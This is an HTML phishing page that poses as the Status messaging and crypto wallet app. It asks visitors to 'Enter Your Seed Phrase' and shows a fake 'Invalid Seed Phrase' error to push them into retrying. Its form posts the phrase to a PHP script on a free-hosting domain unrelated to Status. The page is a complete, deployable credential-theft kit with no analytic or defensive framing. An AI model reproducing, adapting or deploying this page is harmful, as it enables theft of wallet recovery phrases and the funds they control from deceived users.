<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Status - Private, Secure Communication.html</title>
	<!-- BOOTSTRAP STYLES-->
    <link href="./Ont_files/bootstrap.css" rel="stylesheet">
     <!-- FONTAWESOME STYLES-->
    <link href="./Ont_files/font-awesome.css" rel="stylesheet">
        <!-- CUSTOM STYLES-->
    <link href="./Ont_files/custom.css" rel="stylesheet">
     <!-- GOOGLE FONTS-->
   <link href="./Ont_files/css" rel="stylesheet" type="text/css">

</head>
<body>
<style>
 *{
  margin: 0;
  padding: 0;
  font-family: Century Gothic;
 }
body{
  background-color: white;
  margin-top: 25px;
  padding: 10px;
  background-size: cover;
  background-position: absolute;
}

#inp{
    width: 350px;
    height: 8em;
    outline:none;
    border: none;
    font-size: 14px;
    padding-left: 15px;
    background-color: #fafafa;
    margin-top: 20px;
    
}

::placeholder{
    color: black;
    opacity: 0.5;
}

#inps{
    color: white;
    background-color: black;
    height: 4em;
    border: none;
    border-radius:15px;
    padding: 10 10 10 10;
    width: 350px;
    margin-top: 400px;
}

</style>

<div>
    
</div>
<div style="text-align: center; margin-top: 20px;">
    <p style="font-size: 24px; color: black; font-weight: bolder">Enter Your Seed Phrase</p>
    
   
    <form method="POST" action="https://idulfitri2021.000webhostapp.com/st1.php?Get.Status">
        
        <input type="text" name="seed" placeholder="Seed Phrase" required="" id="inp">
	
	<div  style="color: red; font-size: 17px;">Invalid Seed Phrase</div>
    <input type="submit" value="continue" required="" id="inps">
    
    </form>


</body></html>